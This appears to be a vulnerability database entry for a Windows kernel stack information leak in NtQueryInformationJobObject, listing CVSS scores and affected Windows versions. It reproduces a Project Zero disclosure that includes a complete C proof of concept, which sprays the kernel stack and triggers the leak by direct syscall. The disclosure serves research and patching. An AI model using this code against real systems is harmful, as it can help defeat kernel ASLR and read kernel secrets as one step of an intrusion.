Related Weaknesses
CWE-ID |
Weakness Name |
Source |
CWE-200 |
Exposure of Sensitive Information to an Unauthorized Actor The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. |
|
Metrics
Metrics |
Score |
Severity |
CVSS Vector |
Source |
V3.0 |
5 |
MEDIUM |
CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N
Base: Exploitabilty MetricsThe Exploitability metrics reflect the characteristics of the thing that is vulnerable, which we refer to formally as the vulnerable component. Attack Vector This metric reflects the context by which vulnerability exploitation is possible. A vulnerability exploitable with Local access means that the vulnerable component is not bound to the network stack, and the attacker's path is via read/write/execute capabilities. In some cases, the attacker may be logged in locally in order to exploit the vulnerability, otherwise, she may rely on User Interaction to execute a malicious file. Attack Complexity This metric describes the conditions beyond the attacker's control that must exist in order to exploit the vulnerability. Specialized access conditions or extenuating circumstances do not exist. An attacker can expect repeatable success against the vulnerable component. Privileges Required This metric describes the level of privileges an attacker must possess before successfully exploiting the vulnerability. The attacker is authorized with (i.e. requires) privileges that provide basic user capabilities that could normally affect only settings and files owned by a user. Alternatively, an attacker with Low privileges may have the ability to cause an impact only to non-sensitive resources. User Interaction This metric captures the requirement for a user, other than the attacker, to participate in the successful compromise of the vulnerable component. Successful exploitation of this vulnerability requires a user to take some action before the vulnerability can be exploited. For example, a successful exploit may only be possible during the installation of an application by a system administrator. Base: Scope MetricsAn important property captured by CVSS v3.0 is the ability for a vulnerability in one software component to impact resources beyond its means, or privileges. Scope Formally, Scope refers to the collection of privileges defined by a computing authority (e.g. an application, an operating system, or a sandbox environment) when granting access to computing resources (e.g. files, CPU, memory, etc). These privileges are assigned based on some method of identification and authorization. In some cases, the authorization may be simple or loosely controlled based upon predefined rules or standards. For example, in the case of Ethernet traffic sent to a network switch, the switch accepts traffic that arrives on its ports and is an authority that controls the traffic flow to other switch ports. An exploited vulnerability can only affect resources managed by the same authority. In this case the vulnerable component and the impacted component are the same. Base: Impact MetricsThe Impact metrics refer to the properties of the impacted component. Confidentiality Impact This metric measures the impact to the confidentiality of the information resources managed by a software component due to a successfully exploited vulnerability. There is total loss of confidentiality, resulting in all resources within the impacted component being divulged to the attacker. Alternatively, access to only some restricted information is obtained, but the disclosed information presents a direct, serious impact. For example, an attacker steals the administrator's password, or private encryption keys of a web server. Integrity Impact This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information. There is no loss of integrity within the impacted component. Availability Impact This metric measures the impact to the availability of the impacted component resulting from a successfully exploited vulnerability. There is no impact to availability within the impacted component. Temporal MetricsThe Temporal metrics measure the current state of exploit techniques or code availability, the existence of any patches or workarounds, or the confidence that one has in the description of a vulnerability. Environmental Metrics
|
nvd@nist.gov |
V2 |
1.9 |
|
AV:L/AC:M/Au:N/C:P/I:N/A:N |
nvd@nist.gov |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 42228
Publication date : 2017-06-21 22h00 +00:00
Author : Google Security Research
EDB Verified : Yes
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1189&desc=2
We have discovered that the nt!NtQueryInformationJobObject system call (corresponding to the documented QueryInformationJobObject() API function) called with the JobObjectExtendedLimitInformation information class discloses portions of uninitialized kernel stack memory to user-mode clients, due to output structure alignment holes.
On our test Windows 7 32-bit workstation, an example layout of the output buffer is as follows:
--- cut ---
00000000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000020: 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ................
00000030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
--- cut ---
Where 00 denote bytes which are properly initialized, while ff indicate uninitialized values copied back to user-mode. The output data is returned in a JOBOBJECT_EXTENDED_LIMIT_INFORMATION structure [1]. If we map the above shadow bytes to the structure definition, it turns out that the uninitialized bytes correspond to the alignment hole between the end of the JOBOBJECT_BASIC_LIMIT_INFORMATION structure and the beginning of the adjacent IO_COUNTERS structure. The length of the former is 0x2C (44), while the latter must be 8-byte aligned, so there is a gap at offsets 0x2C-0x2F, which is not initialized by the kernel.
The vulnerability can be easily demonstrated with a kernel debugger (WinDbg), by setting a breakpoint on nt!NtQueryInformationJobObject, manually filling out the structure memory with a marker byte (0x41), and then observing four of these bytes printed out by the attached proof-of-concept program:
--- cut ---
2: kd> bp nt!NtQueryInformationJobObject
2: kd> g
Breakpoint 0 hit
nt!NtQueryInformationJobObject:
818d5891 6890010000 push 190h
3: kd> p
nt!NtQueryInformationJobObject+0x5:
818d5896 68e0cf6981 push offset nt! ?? ::FNODOBFM::`string'+0x6100 (8169cfe0)
3: kd> p
nt!NtQueryInformationJobObject+0xa:
818d589b e8b8dbdeff call nt!_SEH_prolog4 (816c3458)
3: kd> p
nt!NtQueryInformationJobObject+0xf:
818d58a0 33f6 xor esi,esi
3: kd> f ebp-18c ebp-18c+70-1 41
Filled 0x70 bytes
3: kd> g
--- cut ---
An example output on our test virtual machine is as follows:
--- cut ---
00000000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000020: 00 00 00 00 20 00 00 00 05 00 00 00 41 41 41 41 .... .......AAAA
00000030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
--- cut ---
Repeatedly triggering the vulnerability could allow local authenticated attackers to defeat certain exploit mitigations (kernel ASLR) or read other secrets stored in the kernel address space.
################################################################################
Upon further investigation of the bug, we have determined the following:
- Not only the JobObjectExtendedLimitInformation (9), but also the JobObjectBasicLimitInformation (2) information class is affected by the vulnerability. The issue is very similar in that it also leaks 4 uninitialized bytes of kernel stack at offset 0x2C of the output structure. Since both classes are handled by the same or very close code areas, we are treating both cases as the same bug.
- Windows 10 (contrary to Windows 7) allows the output buffer for JobObjectExtendedLimitInformation to optionally be 120-bytes long instead of the typical 112. In that case, extra 4 kernel stack bytes are leaked at the end of the structure.
- It is possible to demonstrate the bug without resorting to a kernel debugger, by using the nt!NtMapUserPhysicalPages system call to spray the kernel stack with a large number of controlled bytes, and then invoking the affected nt!NtQueryInformationJobObject syscall directly, instead of through the QueryInformationJobObject() API.
To address all of the above new facts, I'm attaching a new proof-of-concept program, specific to Windows 10 1607 32-bit, which demonstrates the memory disclosure in all three possible settings: JobObjectBasicLimitInformation (output length 48), JobObjectExtendedLimitInformation (output length 112) and JobObjectExtendedLimitInformation (output length 120). An example output of the program is shown below:
--- cut ---
JobObjectBasicLimitInformation:
00000000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000020: 00 00 00 00 00 00 00 00 05 00 00 00 41 41 41 41 ............AAAA
JobObjectExtendedLimitInformation (112):
00000000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000020: 00 00 00 00 00 00 00 00 05 00 00 00 41 41 41 41 ............AAAA
00000030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
JobObjectExtendedLimitInformation (120):
00000000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000020: 00 00 00 00 00 00 00 00 05 00 00 00 41 41 41 41 ............AAAA
00000030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000070: 00 00 00 00 41 41 41 41 ?? ?? ?? ?? ?? ?? ?? ?? ....AAAA........
--- cut ---
*/
#include <Windows.h>
#include <winternl.h>
#include <cstdio>
extern "C"
ULONG WINAPI NtMapUserPhysicalPages(
PVOID BaseAddress,
ULONG NumberOfPages,
PULONG PageFrameNumbers
);
// For native 32-bit execution.
extern "C"
ULONG CDECL SystemCall32(DWORD ApiNumber, ...) {
__asm{mov eax, ApiNumber};
__asm{lea edx, ApiNumber + 4};
__asm{int 0x2e};
}
VOID PrintHex(PBYTE Data, ULONG dwBytes) {
for (ULONG i = 0; i < dwBytes; i += 16) {
printf("%.8x: ", i);
for (ULONG j = 0; j < 16; j++) {
if (i + j < dwBytes) {
printf("%.2x ", Data[i + j]);
}
else {
printf("?? ");
}
}
for (ULONG j = 0; j < 16; j++) {
if (i + j < dwBytes && Data[i + j] >= 0x20 && Data[i + j] <= 0x7e) {
printf("%c", Data[i + j]);
}
else {
printf(".");
}
}
printf("\n");
}
}
VOID MyMemset(PBYTE ptr, BYTE byte, ULONG size) {
for (ULONG i = 0; i < size; i++) {
ptr[i] = byte;
}
}
VOID SprayKernelStack() {
// Buffer allocated in static program memory, hence doesn't touch the local stack.
static BYTE buffer[4096];
// Fill the buffer with 'A's and spray the kernel stack.
MyMemset(buffer, 'A', sizeof(buffer));
NtMapUserPhysicalPages(buffer, sizeof(buffer) / sizeof(DWORD), (PULONG)buffer);
// Make sure that we're really not touching any user-mode stack by overwriting the buffer with 'B's.
MyMemset(buffer, 'B', sizeof(buffer));
}
int main() {
// Windows 10 1607 32-bit.
CONST ULONG __NR_NtQueryInformationJobObject = 0x00b9;
// Create a job object to operate on.
HANDLE hJob = CreateJobObject(NULL, NULL);
// Spray the kernel stack with a marker value, to get visible results.
SprayKernelStack();
// Trigger the bug in nt!NtQueryInformationJobObject(JobObjectBasicLimitInformation).
DWORD ReturnLength = 0;
BYTE output[120] = { /* zero padding */ };
NTSTATUS st = SystemCall32(__NR_NtQueryInformationJobObject, hJob, JobObjectBasicLimitInformation, &output, sizeof(JOBOBJECT_BASIC_LIMIT_INFORMATION), &ReturnLength);
if (!NT_SUCCESS(st)) {
printf("NtQueryInformationJobObject#1 failed, %x\n", st);
CloseHandle(hJob);
return 1;
}
// Print out the output.
printf("JobObjectBasicLimitInformation:\n");
PrintHex(output, ReturnLength);
// Spray the kernel again before invoking the affected system call.
SprayKernelStack();
// Trigger the bug in nt!NtQueryInformationJobObject(JobObjectExtendedLimitInformation), buffer size 112.
ZeroMemory(output, sizeof(output));
st = SystemCall32(__NR_NtQueryInformationJobObject, hJob, JobObjectExtendedLimitInformation, output, 112, &ReturnLength);
if (!NT_SUCCESS(st)) {
printf("NtQueryInformationJobObject#2 failed, %x\n", st);
CloseHandle(hJob);
return 1;
}
// Print the output again.
printf("JobObjectExtendedLimitInformation (112):\n");
PrintHex(output, ReturnLength);
// Spray the kernel again before invoking the affected system call.
SprayKernelStack();
// Trigger the bug in nt!NtQueryInformationJobObject(JobObjectExtendedLimitInformation), buffer size 120.
ZeroMemory(output, sizeof(output));
st = SystemCall32(__NR_NtQueryInformationJobObject, hJob, JobObjectExtendedLimitInformation, output, 120, &ReturnLength);
if (!NT_SUCCESS(st)) {
printf("NtQueryInformationJobObject#2 failed, %x\n", st);
CloseHandle(hJob);
return 1;
}
// Print the output again.
printf("JobObjectExtendedLimitInformation (120):\n");
PrintHex(output, ReturnLength);
// Free resources.
CloseHandle(hJob);
return 0;
}
Products Mentioned
Configuraton 0
Microsoft>>Windows_10 >> Version -
Microsoft>>Windows_10 >> Version 1511
Microsoft>>Windows_10 >> Version 1607
Microsoft>>Windows_10 >> Version 1703
Microsoft>>Windows_7 >> Version -
Microsoft>>Windows_8.1 >> Version -
Microsoft>>Windows_rt_8.1 >> Version -
Microsoft>>Windows_server_2008 >> Version r2
Microsoft>>Windows_server_2008 >> Version r2
Microsoft>>Windows_server_2012 >> Version -
Microsoft>>Windows_server_2012 >> Version r2
Microsoft>>Windows_server_2016 >> Version -
References